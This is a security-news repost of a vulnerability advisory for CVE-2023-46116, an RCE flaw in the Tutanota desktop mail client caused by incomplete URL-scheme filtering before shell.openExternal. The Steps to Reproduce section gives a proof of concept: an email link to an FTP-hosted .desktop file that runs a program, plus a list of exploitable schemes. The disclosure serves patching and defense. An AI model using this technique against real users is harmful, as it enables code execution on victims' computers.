Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-46116: Remote Code Execution via insufficiently sanitized call to shell.openExternal

Tutanota (Tuta Mail) is an encrypted email provider. Tutanota allows users to open links in emails in external applications. Prior to version 3.118.12, it correctly blocks the file: URL scheme, which can be used by malicious actors to gain code execution on a victims computer, however fails to check other harmful schemes such as ftp:, smb:, etc. which can also be used. Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim’s computer. Version 3.118.2 contains a patch for this issue.

CVE
Open in Source
#xss#vulnerability#web#mac#ubuntu#git#rce#perl#samba#auth

Summary

Tutanota allows users to open links in emails in external applications. It correctly blocks the file: URL scheme, which can be used by malicious actors to gain code execution on a victims computer, however fails to check other harmful schemes such as ftp:, smb:, etc. which can also be used.

Details

  • Observe that on #L423 in src/desktop/ApplicationWindow.ts, the parsedUrl parameter is passed into a shell.openExternal function call.
  • Observe that on #L417 in src/desktop/ApplicationWindow.ts, only the file: scheme is blocked.
  • An attacker can craft a malicious email, containing a hyperlink using schemes such as ftp:, smb:, ms-msdt:, search-ms:, etc. to gain RCE on a victims computer when clicked.

Steps to Reproduce

This PoC uses Ubuntu with the XFCE desktop environment, since it is least complicated to reproduce using this setup

  • Execute and authenticate to the Tutanota desktop version 3.118.8 AppImage on a Ubuntu Desktop with the XFCE environment.

  • On another machine, host an FTP server with anonymous access enabled. Create and place a pwn.desktop file in the FTP root, with the following content:

    [Desktop Entry] Exec=xcalc Type=Application

  • Send an email to the email account logged in on tutanota containing a hyperlink pointing to the pwn.desktop file on the FTP server. Replace the corresponding values in the hyperlink: ftp://username:password@ip-address/pwn.desktop.

  • On the tutanota desktop application, click on the hyperlink in the email received. Observe that the calculator application opens. You may need to confirm execution of the application in some cases.

PoC

  • Video PoC for the final stage of the exploit (victim clicks on link in email):
    https://user-images.githubusercontent.com/46137338/270564886-7a0389d3-f9ef-44e1-9f5e-57ccc72dcaa8.mp4

Impact

Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victims computer.

References

  • https://positive.security/blog/url-open-rce
  • https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps#rce-via-shell.openexternal

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE